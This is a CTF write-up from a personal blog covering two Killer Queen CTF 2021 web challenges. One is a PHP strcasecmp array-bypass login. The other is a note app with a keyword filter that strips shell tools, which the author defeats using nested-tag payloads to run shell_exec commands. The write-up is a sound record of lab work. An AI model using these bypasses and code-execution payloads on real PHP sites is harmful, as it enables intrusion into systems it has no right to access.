atx0mg's Fortress.

Killer Queen CTF 2021

ctf
Word count: 668Reading time: 4 min
2021/10/31

Web

Just Not My Type


Read More →

  • Challenge Description => Simple login page

  • Source code:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    <h1>I just don't think we're compatible</h1>

    <?php
    $FLAG = "shhhh you don't get to see this locally";

    if ($_SERVER['REQUEST_METHOD'] === 'POST')
    {
        $password = $_POST["password"];
        if (strcasecmp($password, $FLAG) == 0)
        {
            echo $FLAG;
        }
        else
        {
            echo "That's the wrong password!";
        }
    }
    ?>

    <form method="POST">
        Password
        <input type="password" name="password">
        <input type="submit">
    </form>

  • Vulnerability:

    • Turned out that strcasecmp in php will return 0 (values are the same) thus bypassing the check point when the parameter is an array
    • The reason is because strcasecmp cannot deal with arrays. If a user pass password[]=123456, it will return NULL. And the comparsion for NULL and 0 results in 0 (e.g. NULL == 0 ==> true)

  • BurpSuite to send the payload

    • We can even send variables without initializing values => Just send password[]

  • Got the flag: flag{no_way!_i_took_the_flag_out_of_the_source_before_giving_it_to_you_how_is_this_possible}

    Resources for first challenge:

  • CSAW-2012-Web

  • PHP Vulnerable functions

  • NULL == 0 return True in PHP

Web

PHat Pottomed Girls

  • Challenge Descriptions

  • Challenge Source code

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    <?php
    session_start();

    function generateRandomString($length = 15) {
        $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
        $charactersLength = strlen($characters);
        $randomString = '';
        for ($i = 0; $i < $length; $i++) {
            $randomString .= $characters[rand(0, $charactersLength - 1)];
        }
        return $randomString;
    }
    function filter($originalstring)
    {
        $notetoadd = str_replace("<?php", "", $originalstring);
        $notetoadd = str_replace("?>", "", $notetoadd);
        $notetoadd = str_replace("<?", "", $notetoadd);
        $notetoadd = str_replace("flag", "", $notetoadd);

        $notetoadd = str_replace("fopen", "", $notetoadd);
        $notetoadd = str_replace("fread", "", $notetoadd);
        $notetoadd = str_replace("file_get_contents", "", $notetoadd);
        $notetoadd = str_replace("fgets", "", $notetoadd);
        $notetoadd = str_replace("cat", "", $notetoadd);
        $notetoadd = str_replace("strings", "", $notetoadd);
        $notetoadd = str_replace("less", "", $notetoadd);
        $notetoadd = str_replace("more", "", $notetoadd);
        $notetoadd = str_replace("head", "", $notetoadd);
        $notetoadd = str_replace("tail", "", $notetoadd);
        $notetoadd = str_replace("dd", "", $notetoadd);
        $notetoadd = str_replace("cut", "", $notetoadd);
        $notetoadd = str_replace("grep", "", $notetoadd);
        $notetoadd = str_replace("tac", "", $notetoadd);
        $notetoadd = str_replace("awk", "", $notetoadd);
        $notetoadd = str_replace("sed", "", $notetoadd);
        $notetoadd = str_replace("read", "", $notetoadd);
        $notetoadd = str_replace("system", "", $notetoadd);

        return $notetoadd;
    }

    if(isset($_POST["notewrite"]))
    {
        $newnote = $_POST["notewrite"];

        //3rd times the charm and I've learned my lesson. Now I'll make sure to filter more than once :)
        $notetoadd = filter($newnote);
        $notetoadd = filter($notetoadd);
        $notetoadd = filter($notetoadd);

        $filename = generateRandomString();
        array_push($_SESSION["notes"], "$filename.php");
        file_put_contents("$filename.php", $notetoadd);
        header("location:index.php");
    }
    ?>

  • Challenge Entry

  • Analysis => find vulnerability at str_replace():

    • Although there exists filter to filter specifc command
    • We can easily bypass str_replace() by reconstructing the string one by one word thus leads to command injections (e.g. if cat is filtered for once, the if we construct a word ccatacattcat, when cat is filtered, cat will remain and we can utilize this vulnerability to construct our payload)

  • Payload:

    • <<<<???? phpinfo(); ????>>>>
    • Result:

  • Payload:

    • <<<<???? echo shell_exec('whoami'); ????>>>>
    • Result:

  • Payload:

    • <<<<???? echo shell_exec('ls -lart'); ????>>>>
    • Result:

  • Payload:

Result

  • I solved two challeges, and all of us solved 9 challenges

Author:atx0mg

Link:https://jeff14994.github.io/2021/10/31/Killer-Queen-CTF-2021/

Publish date:October 31st 2021, 11:06:56 am

Update date:April 22nd 2022, 5:18:57 am

License:This article is licensed under CC BY-NC 4.0

CATALOG
  1. 1. Web
    1. 1.0.1. Just Not My Type
  2. 1.1. Resources for first challenge:
  • 2. Web
    1. 2.0.1. PHat Pottomed Girls
  • 2.1. Resources for challenge 2
  • 3. Result
    • Total : 11
    2022
    2021
    ctf wargame 2022 rop ROP Emporium pwn forensics AIS3